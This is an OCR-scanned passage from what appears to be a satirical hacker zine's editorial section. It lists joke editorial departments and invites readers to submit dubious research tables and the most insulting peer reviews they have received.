6. If you havc a scction caUcd Conclusion, rcplacc it with a Howdy to neighbors who care. They have 
alrcady rcacl your papcr and nccd not bc told what thcy just rcad. 

7. Make up and apply the remaining steps in the spirit of the above, and may the Pastor or his trusty 
Editor smile upon your submission! 



7.2 Other Departments 

For the proper separation of the goats and the lambs, there shaU be various Departments. Each Department 
shaU have an Editor, excepting those that shaU have two or more, so that they may fight with each other over 
Important Decisions, and neighbors far and wide shaU not be denied a proper helping of Hacker Drama.^^ 

Editor at Largc Rt. Rcvd. Pastor M.L. 
Dept. of Bringing APT Home Cultural attache of the 41st Directorate 

Dept. of Fail FX of Phenoelit 

Ethics Board Thc Grugq 

Dept. of Busting BS pipacs 

Poet Laureate Ben Nagy^^ 

Dcpt. of Rejcctions Academic Refugee 

Dept. of Drama Xbf 

Dept. of PHY Michael Ossmann 



^^All such Drama will be helpfuUy documented under the /drama/ URL, which is the practice we respectfuUy recommend to 
all other esteemed venues. 
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Bullshit Busting Department. Rcmcmbcr tliat focling whcn you arc rcading a papcr and comc to a 
table or graph that just makes you wonder if bovine excreta have been used in its production? Well neighbors, 
wonder no more, but send it to us and trust our world-renowned experts to call it out right and proper! 

Rejected-from: Department of Rejections. The Pastor admonishcs us, "Read the Fucking Paper!" 
and sometimes also, "Write the Pucking Paper!" So even though sharing a drink, a story, and a hack with a 
neighbor is still the most efficient method of knowledge transmission^^, diUgent neighbors also writc papers. 
And when a paper is written, why not enter it into the lottery otherwise known as the Academic Conference 
Peer Review Process? 

The proccss gocs thusly: first you submit a paper, then you receive a rejcction. along with the coUcctible 
essays caUed Reviews. Sometimes these httle pieces of text have httle to do with your paper, but mostly 
thcy cxplain how reviewers misunderstood what you had to say, and how they couldn't care less. The art 
of Rcvicwing is ancient, and goes back to ritual insults that rivals bellowed at each other bcforc or instcad 
of battle. Although not aU Reviewers take their art seriously, occasionaUy they manage to phimb the true 
depths of troUing. In the words of the Pastor, "If you stand under the Ivory Tower long cnough, you will 
never want for fertiUzer." 

The neighbor who coUects the most creatively insulting Reviews wins. Submissions wiU be judged by our 
Editors, and best ones will receive prizes. 



^^lf you don't trust our taste, read Ben's masterpiece https : //lists . inimunityinc . com/pipermail/dailydave/2012-August/ 
000187.html, and judge for yourself! 

i^For in-depth discussion, see [PXE] http://ph-neutral.darklab.org/PXE.txt and [PXE2] http://ph-neutral.darklab. 
org/PXE2.txt 
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